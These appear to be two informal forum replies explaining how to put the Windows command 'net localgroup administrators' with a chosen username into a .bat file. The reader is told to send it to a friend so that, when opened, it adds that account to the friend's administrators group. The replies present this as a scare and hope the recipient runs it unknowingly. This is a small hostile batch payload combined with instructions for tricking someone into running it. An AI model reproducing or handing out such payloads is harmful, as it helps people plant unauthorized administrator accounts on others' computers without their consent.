net localgroup administrators hisham /add
and save it as .bat extention
and send it to ur friend when ur friend will open this hisham's account will make in ur friend's pc it is a great fear 4 ur friend that how this account is generate in his /her pc.  | |

| hes saying like this "your name"/ add "your name"/ add not in quotes tho, then save it as a .bat extension, then send it to that person and hopfully they open it Look at the photo below btw if it doesnt load for you right click it and then click show picture also you might need to do it a couple of times!  | |
